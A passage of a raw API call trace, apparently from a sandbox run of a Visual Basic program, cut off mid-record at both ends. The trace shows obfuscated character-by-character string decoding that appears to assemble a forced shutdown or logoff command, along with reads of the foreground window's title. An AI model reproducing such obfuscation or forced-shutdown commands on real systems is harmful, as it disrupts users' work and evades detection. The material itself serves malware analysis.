(in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\", lpUsedDefaultChar=0x0) returned 1 [0088.868] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0088.868] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0088.869] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0088.869] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0088.870] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0088.870] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0088.871] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0088.871] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0088.872] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0088.872] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0088.873] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0088.873] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.874] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.874] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0088.875] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0088.875] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0088.876] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0088.876] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0088.877] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0088.877] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0088.878] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0088.878] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.879] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.879] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.879] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.880] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0088.880] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0088.880] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.881] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.881] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.882] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.882] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0088.883] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0088.883] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.884] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.884] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.884] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.885] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.885] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.885] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.886] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.886] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.887] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.887] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.887] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.888] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.888] GetForegroundWindow () returned 0x102c2 [0088.888] GetLastError () returned 0x0 [0088.888] SysStringLen (param_1=" ") returned 0xff [0088.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0088.888] SysStringLen (param_1=" ") returned 0xff [0088.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0088.888] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0088.889] GetLastError () returned 0x0 [0088.890] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0088.890] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0088.890] SysStringLen (param_1="Activity Arrive Event") returned 0x16 [0088.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Activity Arrive Event", cchWideChar=23, lpMultiByteStr=0xe3717c, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Activity Arrive Event", lpUsedDefaultChar=0x0) returned 23 [0088.891] SetWindowTextA (hWnd=0x2036e, lpString="Activity Arrive Event") returned 1 [0088.891] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0088.891] GetFocus () returned 0x0 [0088.891] lstrlenA (lpString="Activity Arrive Event") returned 21 [0088.891] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe3717c) returned 0x1 [0088.891] IsWindow (hWnd=0x2036e) returned 1 [0088.891] IsWindow (hWnd=0x2036e) returned 1 [0088.892] IsWindow (hWnd=0x2036e) returned 1 [0088.892] IsWindow (hWnd=0x2036e) returned 1 [0088.892] GetFocus () returned 0x0 [0088.892] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x15 [0088.893] GetFocus () returned 0x0 [0088.893] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x16) returned 0x3102b58 [0088.893] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x16, lParam=0x3102b58) returned 0x15 [0088.893] GetFocus () returned 0x0 [0088.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0088.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=-1, lpWideCharStr=0xe3717c, cchWideChar=22 | out: lpWideCharStr="Activity Arrive Event") returned 22 [0088.893] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102b58 | out: hHeap=0x30f0000) returned 1 [0088.893] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0088.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0088.894] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0088.895] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0088.895] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0088.896] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0088.896] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0088.897] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0088.897] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0088.897] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0088.898] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0088.899] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0088.899] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0088.899] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0088.900] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0088.900] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.901] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.901] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0088.901] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0088.902] VarCat (in: 